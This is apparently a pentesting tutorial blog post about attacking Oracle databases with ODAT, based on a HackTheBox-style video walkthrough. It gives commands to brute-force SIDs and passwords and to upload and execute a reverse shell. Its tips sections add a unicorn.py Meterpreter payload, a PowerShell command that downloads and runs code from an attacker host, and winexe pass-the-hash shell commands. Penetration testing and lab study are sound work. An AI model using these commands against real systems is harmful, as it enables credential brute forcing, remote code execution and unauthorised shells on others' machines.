Hacking Tutorial, Pentesting

Pentesting Oracle Databases with The Oracle Database Exploitation Tool (ODAT)

When coming across an Oracle database, there is an awesome framework that you can use for pentesting it called The Oracle Database Exploitation Tool (ODAT). This post intends to serve as a guide for leveraging this tool, based on what Ippsec performs during his Silo video.

Table of Contents:

  • Installing ODAT
  • Bruteforcing SIDs
  • Brute Forcing User Accounts
  • Gaining a Reverse Shell

Installing ODAT

The Oracle Database Exploitation Tool (ODAT) is available for download at https://github.com/quentinhardy/odat.

We’ll start by changing into opt and running git.

cd /opt
git clone https://github.com/quentinhardy/odat.git

Then we’ll change into the directory and install additional packages.

cd odat/
sudo apt-get install libaio1 python3-dev alien python3-pip

Get instant client basic, sdk (devel) and sqlplus from the Oracle web site:

X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html
X86: http://www.oracle.com/technetwork/topics/linuxsoft-082809.html

Move the downloaded file into this directory and run the following command.

sudo alien --to-deb *.rpm

This should unpack a few files, and then run.

sudo dpkg -i *.deb

Put these lines in your /etc/profile file in order to define Oracle env variables:

export ORACLE_HOME=/usr/lib/oracle/<version>/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Then restart your session!


Bruteforcing SIDs

The SID is something that you have to provide with the rest of our commands in order to leverage this tool. I’m not sure exactly what a SID is, but I like to pretend that it’s a container that contains multiple databases. Because of this, we need to first identify what SIDs are in use before we can enumerate user accounts.

To begin our attack, we can use the following:

./odat.py sidguess -s <targetIP> -p <port>

Note: You can also use the Metasploit module /oracle/sid_brute

Eventually, the valid SIDs should be returned.


Brute Forcing User Accounts

Next, we can leverage the passwordguesser module to guess credentials. By default, ODAT will use a password file that is in all caps, but you may or may not want to alter and/or change the file used. For example, some versions of Oracle may be case sensitive and you won’t want a password file in all caps.

If you want to customize the wordlist, you can modify the file located at the following path:

/opt/odat/accounts/accounts.txt

You could even copy the wordlist that Metasploit uses, which is located at the following path. Just make sure to reformat your wordlist in the correct format:

/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

Once you’re ready to run the attack, you can with the following command.

./odat.py passwordguesser -s <targetIP> -d <SID>


Gaining a Reverse Shell

A quick snippet of the help documentation can be found below.

To gain a shell, you can upload a reverse shell to the box, as long as you have identified a valid SID and valid user credentials with write privileges:

./odat.py utilfile -s <targetIP> --sysdba -d <SID> -U <username> -P <password> --putFile <remotePath> <remoteFilename> <localFilename>

Ippsec shows doing this within his Silo video like this.

Then you can execute the file using the following command. Make sure you set up a listener to catch your shell.

./odat.py externaltable -s <targetIP> --sysdba -d <SID> -U <username> -P <password> --exec <remotePath> <remoteFilename>


Tips & Tricks

Using Unicorn.py to Automate PowerShell Meterpeter Shells

There’s an awesome tool on Github you can download by running the following command.

sudo git clone https://github.com/trustedsec/unicorn.git

Running the Python script will generate some output that you can copy/paste to create the necessary payload.

python unicorn.py

For example, I can quickly generate a PowerShell reverse shell payload by running the following command.

sudo python unicorn.py windows/meterpreter/reverse_https <attackerIP> 443

That command created two files.

powershell_attack.txt – Contains my malicious PowerShell payload.
unicorn.rc – Will allow us to easily spin up a listener in Metasploit.

Let’s copy both of these files and move them over to where we want them. I will place powershell_attack.txt in a directory that I’m hosting up w/ a webserver, and then I’ll place unicorn.rc into a directory that I want to start my Metasploit listener within.

I’ll start my Metasploit listener with the following code.

sudo msfconsole -r unicorn.rc

And then we just need to execute the following PowerShell code on the victim.

powershell "IEX(New-Object Net.WebClient).downloadString('http://<attackerIP>/powershell_attack.txt')"

Tips & Tricks

Popping Remote Shells w/ winexe & pth-winexe on Windows

If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured a NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash.


Basic syntax w/ credentials.

winexe -U <domain/username>%<password> //<targetIP> cmd.exe

Basic syntax w/ NTLM hash (pass the hash technique).

pth-winexe -U <domain/username>%<hash> //<targetIP> cmd.exe

Additional details about the command can be found here. https://tools.kali.org/maintaining-access/winexe